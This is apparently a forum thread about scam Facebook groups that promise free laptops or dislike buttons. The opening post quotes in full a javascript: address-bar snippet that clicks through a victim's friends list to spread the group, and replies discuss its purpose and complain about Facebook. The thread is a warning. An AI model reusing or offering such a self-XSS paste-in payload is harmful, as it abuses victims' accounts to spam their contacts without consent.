Unusual Facebook Groups.

Just recently I've noticed a flurry of facebook groups promising the likes of free laptops or the addition of skinned facebook pages and dislike buttons. One thing they've all had in common is the instuctions on how to do it. Each one of these asks to input this:

javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] === 'object'){fs.click(elms[fid]);}}

into the address bar. They then ask you to visit a site which always wants you to disable adblock plus before continuing.

Now I'm not sure what the heck this all does but it seems very suspicious. Can anyone shed any light on this situation apart from don't get suckered into one of these useless groups?

Ahhh so they use that to draw more people to the group and ultimately their data collection sites.

Another reason why a new facebook needs to be found.

Report them.

Facebook is the first social networking site I actually "get". Not quite as useless or as stupid as the ones before it... though quite useless in many ways...

I'd hate to see this go the way of Friendster.

Wouldn't surprise me if Facebook went down the pan at some point, not only is their revenue shocking for their impressions, but ignoring fundamental laws on your website and hosting illegal content, won't keep you open for long.

I actually hope Facebook goes down soon. It's monopolised the area and nothing else is given a chance anymore, even though it is clear Facebook as become progressively worse, every new revision seems to be hated by all.
